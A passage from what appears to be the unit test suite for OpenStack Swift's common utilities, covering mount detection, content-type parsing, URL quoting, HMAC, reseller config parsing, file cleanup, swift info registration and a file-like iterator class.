with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
        res = utils.quote('/v1/a/c3/subdirx/')
        self.assertEqual(res, '/v1/a/c3/subdirx/')
        res = utils.quote('/v1/a&b/c3/subdirx/')
        self.assertEqual(res, '/v1/a%26b/c3/subdirx/')
        res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
        self.assertEqual(res, '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F')
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
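        # %EF%BF%BD is the percent-encoded UTF-8 form of U+FFFD, the Unicode
        # replacement character, so the invalid byte sequence above is being
        # sanitized by get_valid_utf8_str() before quoting.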
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
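        # A 40-character hex digest suggests HMAC-SHA1; presumably the method,
        # the expiry (1) and the path are combined with the key 'abc', though
        # the exact message layout is up to utils.get_hmac().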
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertIsNone(utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
            # fsync_dir on parents of all newly created dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
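        # Note the convention exercised here: a blank reseller prefix is
        # written as '' in the config, and its per-prefix options are keyed
        # with a literal "''" prefix (e.g. "''operator_roles").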
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
class TestUnlinkOlder(unittest.TestCase):
def setUp(self):
self.tempdir = mkdtemp()
self.mtime = {}
def tearDown(self):
rmtree(self.tempdir, ignore_errors=True)
def touch(self, fpath, mtime=None):
self.mtime[fpath] = mtime or time.time()
        open(fpath, 'w').close()
@contextlib.contextmanager
def high_resolution_getmtime(self):
orig_getmtime = os.path.getmtime
def mock_getmtime(fpath):
mtime = self.mtime.get(fpath)
if mtime is None:
mtime = orig_getmtime(fpath)
return mtime
with mock.patch('os.path.getmtime', mock_getmtime):
yield
def test_unlink_older_than_path_not_exists(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_older_than(path, time.time())
def test_unlink_older_than_file(self):
path = os.path.join(self.tempdir, 'some-file')
self.touch(path)
with self.assertRaises(OSError) as ctx:
utils.unlink_older_than(path, time.time())
self.assertEqual(ctx.exception.errno, errno.ENOTDIR)
def test_unlink_older_than_now(self):
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, time.time())
self.assertEqual([], os.listdir(self.tempdir))
def test_unlink_not_old_enough(self):
start = time.time()
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, start)
self.assertEqual(['test'], os.listdir(self.tempdir))
def test_unlink_mixed(self):
self.touch(os.path.join(self.tempdir, 'first'))
cutoff = time.time()
self.touch(os.path.join(self.tempdir, 'second'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, cutoff)
self.assertEqual(['second'], os.listdir(self.tempdir))
def test_unlink_paths(self):
paths = []
for item in ('first', 'second', 'third'):
path = os.path.join(self.tempdir, item)
self.touch(path)
paths.append(path)
        # only pass the first two paths, so 'third' must survive
with self.high_resolution_getmtime():
utils.unlink_paths_older_than(paths[:2], time.time())
self.assertEqual(['third'], os.listdir(self.tempdir))
def test_unlink_empty_paths(self):
# just make sure it doesn't blow up
utils.unlink_paths_older_than([], time.time())
def test_unlink_not_exists_paths(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_paths_older_than([path], time.time())
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), b''.join(in_iter))
def test_read_with_size(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(b''.join(chunks), b''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'')
def test_readline(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter([b'abc', b'def\n']).readline(4),
b'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(),
(b'a' * 1111) + b'bc\n')
def test_readline_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n',
b'k\n', b'tr', b'ai', b'li', b'ng', b'.'])
def test_readlines(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readlines_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'],
[b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'],
[b'.']])
def test_close(self):
iter_file = utils.FileLikeIter([b'a', b'b', b'c'])
self.assertEqual(next(iter_file), b'a')
